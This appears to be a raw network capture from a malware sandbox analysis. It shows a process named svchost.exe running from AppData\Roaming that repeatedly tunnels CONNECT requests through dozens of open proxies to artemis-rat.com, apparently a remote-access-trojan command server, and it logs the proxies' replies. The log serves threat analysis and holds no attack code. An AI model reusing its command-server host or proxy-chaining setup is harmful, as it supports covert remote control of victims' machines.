                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2646192.168.2.558743129.213.150.2058043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.181071043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2647192.168.2.55861034.88.54.123312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.181075096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.942547083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.942907095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.942852974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2648192.168.2.558595185.81.153.162338943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.181101084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2649192.168.2.558772162.159.242.628043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.183809042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.344774961 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2650192.168.2.55862843.155.142.1161567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.183866024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2651192.168.2.558679119.28.4.112999943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.188275099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2652192.168.2.558585203.95.198.170808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.198503971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2653192.168.2.55869020.111.54.16812343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.200139999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.498517990 CET319INHTTP/1.1 403 Forbidden
                                                                                    Server: squid
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 17
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    X-Cache: MISS from cdn-fintech.info
                                                                                    X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                    Data Ascii: ERR_ACCESS_DENIED


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2654192.168.2.55864586.107.179.234312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.200581074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.067467928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.068213940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.126650095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2655192.168.2.558289117.160.250.1328043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.200668097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.040719032 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2656192.168.2.55865294.177.106.178232443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.200680017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2657192.168.2.558643194.182.178.90312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.200685024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.529592037 CET28INHTTP/1.1 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2658192.168.2.55860779.143.187.581899043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.200748920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2659192.168.2.558648115.239.234.43730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.200912952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.553297997 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2660192.168.2.558731163.15.183.33312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.206440926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.880487919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.816036940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.658622980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.378413916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2661192.168.2.555702103.90.227.244312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.206723928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2662192.168.2.55868194.30.152.1728043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.219338894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2663192.168.2.558825104.20.198.498043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.219737053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.375391006 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:31 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2664192.168.2.558783142.54.228.193414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.219995022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.880029917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2665192.168.2.558637202.139.198.15303043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.220038891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2666192.168.2.558684167.172.86.461047143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.220163107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2667192.168.2.557714190.110.226.1628043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.220314026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.380093098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.474405050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2668192.168.2.55863093.90.212.2415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.220417976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2669192.168.2.558644138.36.150.16108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.220583916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2670192.168.2.558711177.12.118.1608043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.220890045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.546093941 CET340INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.2
                                                                                    Date: Sat, 09 Mar 2024 12:14:25 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2671192.168.2.558698120.79.101.0888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:31.221362114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.560214996 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
